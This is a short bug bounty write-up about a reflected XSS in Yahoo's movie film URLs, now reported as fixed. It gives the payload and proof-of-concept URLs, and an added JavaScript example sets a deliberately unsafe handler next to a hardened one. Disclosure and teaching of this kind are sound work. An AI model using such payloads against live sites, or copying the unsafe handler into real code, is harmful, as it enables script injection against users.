Reflected XSS in yahoo.com

Hello guys, this is Shahzada Al Shahriar Khan.
I am from Bangladesh, and I am a newbie in bug bounty. :P
Well, now I will share how I found a reflected Cross-Site Scripting (XSS) vulnerability in the main domain and a subdomain of Yahoo.

Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]

Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
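
The pattern behind a finding like this, as an added example that is not from the original post and is not Yahoo's code: a handler percent-decodes the film path segment (so `%2f` becomes `/`) and echoes it into HTML without encoding, shown next to a hardened version. The attribute sink, the slug allowlist and all function names are assumptions made for illustration.

```javascript
// Added illustration: hypothetical handler for /movies/film/<slug>; not Yahoo's code.
// Constructed sample input: the path segment from the PoC URL above.
const POC_SEGMENT = '"><%2fscript><script>alert(document.domain)<%2fscript>';

// Frameworks percent-decode a path segment after routing, so %2f survives
// path splitting and only becomes "/" once it is inside the handler.
function decodeSegment(raw) {
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return null; // malformed escape sequence: treat as a bad request
  }
}

// Before (assumed sink): the decoded slug is concatenated into an attribute value.
function renderUnsafe(raw) {
  const slug = decodeSegment(raw) ?? '';
  return `<a class="film" href="/movies/film/${slug}">Details</a>`;
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// After: allowlist the slug, URL-encode it for the href, and HTML-escape
// anything that is still echoed back in an error page.
const SLUG_RE = /^[a-z0-9-]{1,100}$/i;
function renderSafe(raw) {
  const slug = decodeSegment(raw);
  if (slug === null) return { status: 400, body: '' };
  if (!SLUG_RE.test(slug)) {
    return { status: 404, body: `<p>No film named ${escapeHtml(slug)}</p>` };
  }
  const href = `/movies/film/${encodeURIComponent(slug)}`;
  return { status: 200, body: `<a class="film" href="${href}">Details</a>` };
}
```

A response-level Content-Security-Policy that disallows inline script is a useful second layer, but the output encoding above is the actual fix.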

[PoC screenshot: Yahoo Canada Subdomain]

Timeline:
Aug 12th - I submitted the report.
Aug 15th - Report triaged; I was rewarded a $300 initial bounty.
Aug 16th - Bug resolved.
Aug 24th - Another $400 bounty rewarded; total bounty is $700.